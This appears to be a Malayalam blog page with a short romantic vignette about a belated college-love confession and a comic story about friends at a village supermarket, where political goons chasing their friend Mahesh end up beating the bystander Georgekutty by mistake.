കുറെ നേരത്തെ സംസാരത്തിന് ശേഷം അവള്‍ എന്നോട് ചോദിച്ചു : കലാലയ നൊമ്പരങ്ങള്‍
എന്നത് കൊണ്ട് നീ എന്താണ് ഉദ്ദേശിച്ചത് ??പെട്ടന്നുള്ള ആ ചോദ്യം എന്നെ വര്‍ഷങ്ങള്‍ പുറകിലേക്കെത്തിച്ചു .അന്നു ഞാന്‍autographil എഴുതിയ വാചകങ്ങളല്ലേ അത്....??അവള്‍ ഇപ്പോഴും അതെല്ലാം ഓര്‍ത്തിരിക്കുന്നു....
കുറച്ചു നേരത്തെ ആലോചനക്കു ശേഷം ഞാന്‍ ഇപ്രകാരം മറുപടി നല്‍കി : കലാലയ നൊമ്പരം എന്നത് കൊണ്ട് ഞാന്‍ ഉദേശിച്ചത്‌ "നിന്നോടുള്ള ഇഷ്ടമായിരുന്നു ".....
കുറച്ചു നേരത്തെ മൌനത്തിനു ശേഷം അവളുടെ ശബ്ദം താഴ്ത്തിയുള്ള മറുപടി ഇപ്രകാരമായിരുന്നു"എനിക്ക് ഷാനിനെ ഒരുപാട്‌ ഇഷ്ടമായിരുന്നു. വീട്ടുകാരെ പേടിച്ചിട്ടാണ് ഞാന്‍ അത് നിന്നോട് പറയാതിരുന്നത്.എല്ലാവരും ഇഷ്ടമാണെന്ന് പറഞ്ഞു എന്നെ ഒരുപാട് ശല്യപ്പെടുതുമായിരുന്നു.നീ ഇതില്‍ നിന്നെല്ലാം വ്യത്യസ്തമായി എന്നെ സ്നേഹിച്ചത് ഞാന്‍ മനസിലാക്കിയിരുന്നു .നീ എന്നെ നോക്കാതിരിക്കുംപോള്‍ എന്റെ മനസ് വേദനിക്കുമായിരുന്നു .. 2 വര്‍ഷം ഞാന്‍ ഷാനിനെ മനസ്സില്‍ ഒരുപാടു സ്നേഹിച്ചു. ഇപ്പോഴും ആ സ്നേഹം എന്‍റെ മനസിലുണ്ട്.."
നീണ്ട 6വര്‍ഷങ്ങള്‍ക്കു ശേഷം എന്‍റെ പ്രണയത്തിന്‍റെ മറുപടി എനിയ്ക്കു കിട്ടിയിരിക്കുന്നു.

" അവള്‍ക്കു എന്നോട് ഇപ്പോഴും ഇഷ്ടമാണത്രെ......."































ജോര്‍ജ്കുട്ടി C/O തോമസ്കുട്ടി

ഈ കഥയുടെ പശ്‌ചാത്തലം ഒരുക്കിയിരിക്കുനത് ഒരു മാര്‍ജിന്‍ ഫ്രീ സൂപ്പര്‍ മാര്‍കെട്ടിലാണ് . അതുകൊണ്ട് തന്നെ ഈ മാര്‍ജിന്‍ ഫ്രീ യെ കുറിച്ച് 2 വാക്ക്......

ഈ സൂപ്പര്‍ marketinte ( സാധനങ്ങല്ക് യാതൊരു markutum ഇല്ല...) proprietor Mr: sanal kumar ആണ്. ഔഷധി .റേഷന്‍ കട, മൊബൈല്‍ സ്റ്റോര്‍ ,പലചരക്ക് കട എല്ലാം... ഭംഗിയായി 3മുറികളില്‍ നടത്തി വരുന്നു.. ഈ കട എന്റെ വീടിനു അടുത്ത് തന്നെ ആണ്. അതുകൊണ്ട് വയ്കുന്നെരങ്ങളിലെ ഞങ്ങള്‍ സുഹൃത്തുക്കളുടെ വാചകമടി ഇവിടുത്തെ ഒടിയാറായ ബെന്ച്ചിലിരുന്നാണ്. . കടയില്‍ നിന്നും ചെറിയ രീതിയിലുള്ള പറ്റും (പിന്നെ സനല്‍ കുമാറിന്റെ pattikkalum ) ഒക്കെയായി വ്യ്കുന്നേരങ്ങളില്‍ അടിച്ചുപൊളി തന്നെ..

ഞങ്ങള്‍ അധികം സംസാരിക്കാത്തവര്‍ ആയതിനാല്‍ ശല്യം കാരണം അങ്ങേ വീടിലെ ജോര്‍ജ്കുട്ടിയും തോമസുകുട്ടിയും ഞങ്ങളുമായി ഉടക്കാറുണ്ട്.


പതിവുപോലെ ഞാനും ഷൈജുവും നേരുതെയെത്തി ബെന്ചില്‍ സ്ഥാനം പിടിച്ചു .പിന്നെ വരുന്നവര്‍ തറകള്‍ .......ക്ഷമിക്കണം തറയില്‍ ഇരുന്നോണം .
ഇത്തവണ മഹേഷ്‌ (തിരുവന്തോരം മഹേഷ്‌ ) കോളേജില്‍ നടന്ന ഭീകര ഗുണ്ടായിസം വിവരിക്കുകയാണ്. എതിര്‍ പാര്‍ട്ടിയുടെ നേതാവിനെ കാലില്‍ പിടിച്ചു വലിച്ച കഥ പറയുമ്പോള്‍ അവന്‍ ചിരിയടക്കാന്‍ പാട് പെടുന്നുണ്ടായിരുന്നു.

കുറെ സമയത്തിനും ശേഷം അപ്രതീക്ഷിതമായി സനല്‍ കുമാറിന്റെ മൊബൈല്‍ ചിലച്ചു... സനല്‍ കുമാര്‍ ഞങ്ങളോട് ഉടനെ രക്ഷപെറ്റൊലന്‍ നിര്‍ദേശം നല്‍കി

ഞങ്ങള്‍ കാര്യം തിരക്കി....
" എടാ എതിര്‍ പാര്‍ട്ടിക്കാര്‍ മഹേഷിനെ അടിക്കാന്‍ മാര്‍ജിന്‍ ഫ്രീ വളയാന്‍ സാധ്യതയുണ്ട്.
അവന്മാര്‍ വന്നാല്‍ പുല്ലാ.... എന്ന മട്ടില്‍ മഹേഷ്‌ അവിടെ തന്നെ ഇരുന്നു..

പെട്ടന്നതാ 2 ജീപുകളിലായി ഗുണ്ടകള്‍ അവിടെ പാഞ്ഞെത്തി .. പെട്ടന്ന് മഹേഷിനെ കാണുന്നില്ല ... അവനെ കിട്ടാത്ത ദേഷ്യത്തില്‍ പിന്നേ എടുത്തോളാം എന്ന ഭീഷണിയോടെ അവന്‍ മാര്‍ തിരികെ പോയി



ഇതിനിടയില്‍ കടയുടെ പുറകില്‍ നിന്നും മഹേഷ്‌ ഷൈജുവിനെ ഫോണില്‍ വിളിച്ചു.

മഹേഷ്‌ : അവന്മാര്‍ പോയോട???
ഷൈജു : പോയി .... പിന്നേ എനിക്കൊരു സമ്മാനവും തന്നു.. നീ എവിടാ ????
മഹേഷ്‌: ഞാനിവിടെ പുറകിലുണ്ട് ..


പറഞ്ഞു തീര്‍ന്നതും ഒരു ദീന രോദനം പുറകില്‍ നിന്നും മുഴങ്ങി

ഞങ്ങള്‍ പുറകിലേക്ക് ഓടി. ചെന്നപ്പോള്‍ കണ്ടതോ.. ?? കഴുത്ത് മാത്രം മുകളില്‍ കാണുന്ന രീതിയില്‍ മഹേഷ്‌ ചാണക കുഴിയില്‍ മുങ്ങി കിടക്കുന്നു. ഞാന്‍ അവനെ കണ്ടില്ല എന്ന ഭാവത്തില്‍ നിന്നപോള്‍ ഷൈജു അവനെ വലിച്ചുകയറ്റി. ഞാന്‍ അവനെ മനസ്സില്‍ പുകഴ്ത്തി ..നല്ല സുഹൃത്ത്‌ .... (പിന്നീട് ഷൈജു അതിന്റെ .. സത്യം പറഞ്ഞു തന്നു....അവന്‍ ചാണക കുഴിയില്‍ കിടന്ന് ചത്താല്‍ തരാനുള്ള 500 rs ആര് തരുമെടാ ?????....)

അപ്പോഴേക്ക് ബഹളം കേട്ട് ജോര്‍ജകുട്ടിയും തോമസുകുട്ടിയും അവിടെ പറന്നെത്തി. പെട്ടന്നതാ തിരികെ പോയ ഗുണ്ടകള്‍ മഹേഷിന്റെ അലര്‍ച്ച കേട്ട് തിരികെയെത്തി.

മഹേഷ്‌ ചാണക ഗന്ധവുമായി ഇരുട്ടില്‍ അലരിക്കൊണ്ടോടി. ചാണകത്തിന്റെ മണം പിടിച്ചു ഗുണ്ടകള്‍ പുറെകെ.......അതിനു പുറകെ ഷൈജുവും തോമസ്കുട്ടി ജോര്‍ജ്ജ്കുട്ടി brothersum

റേഷന്‍ കടയില്‍ അന്ന് സ്റ്റോക്ക് വന്നതിനാല്‍ അരിച്ചാക്കിനിടയില്‍ ഒളിച്ചു ഞാന്‍ എന്റെ ബോഡി രക്ഷിച്ചു. ൨ മിനിട്‌നെ ശേഷം ഒരു ഭീകരമായ അലര്‍ച്ച തോട്ടത്തില്‍ നിന്നും മുഴങ്ങി.



ഞാന്‍ അരിചാകിനിടയിലേക്ക് ഒന്ന് കൂടി ഒതുങ്ങികയറി . മഹേഷിനെ അവന്മാര്‍ വെട്ടിക്കാനും ……..ദൈവമേ..... നീ അവനെ കാത്തോണേ... ഗുണ്ടകള്‍ ഓടി വണ്ടിയില്‍ കയറി രക്ഷ പെട്ടു..
ഞാന്‍ അരിക്കിടയില്‍ നിന്നും പുറത്തിറങ്ങി

കുറെ കഴിഞ്ഞപ്പോള്‍ തോമസ് കുട്ടി ജോര്‍ജകുട്ടിയെ താങ്ങി കൊണ്ടുപോകുന്നു..എനിക്കൊന്നും മനസിലായില്ല.. പുറകെ വന്ന ഷൈജു കഥകള്‍ വിശദീകരിച്ചു ,അതിപ്രകാരം ...

ഇരുട്ടില്‍ തോട്ടത്തിലൂടെയുള്ള ഓട്ടത്തിനിടയില്‍ മഹേഷ്‌ മറിഞ്ഞു വീണു . ഗുണ്ടകള്‍ക്ക് ചാണകത്തിന്റെ മണം പിടിക്കഞ്ഞതിനാല്‍ അവന്മാര്‍ മഹേഷിനെ തല്ലിയില്ല .. പുറകെ ഓടിവന്ന ജോര്‍ജ്ജ്കുട്ടി മഹേഷിന്റെ ആളാണെന്ന് കരുതി അവന്മാര്‍ ജോര്‍ജ് കുട്ടിക്ക് പണി കൊടുത്തേച്ച് പോയി..അതാണ് അടികൊണ്ടു off ആയ ജോര്‍ജ് കുട്ടിയെ തോമസ് കുട്ടി care ചെയ്തു കൊണ്ടുപോയ കാഴ്ച ഞാന്‍ കണ്ടതും ..

ഇപ്പോളും അടിയുടെ ഷോക്കില്‍ നിന്നും ജോര്‍ജ് കുട്ടി മോചിതനായിട്ടില്ല ..രാത്രിയില്‍ മഹേഷേ ....എന്നലറിക്കൊണ്ട് ഞെട്ടി എനീക്കരുണ്ടാത്രേ..


വാല്‍കഷണം : മഹേഷ്‌ കൊടുത്താല്‍ ജോര്‍ജ് കുട്ടിക്കും കിട്ടും സമ്മാനം..... അല്ല പിന്നെ .........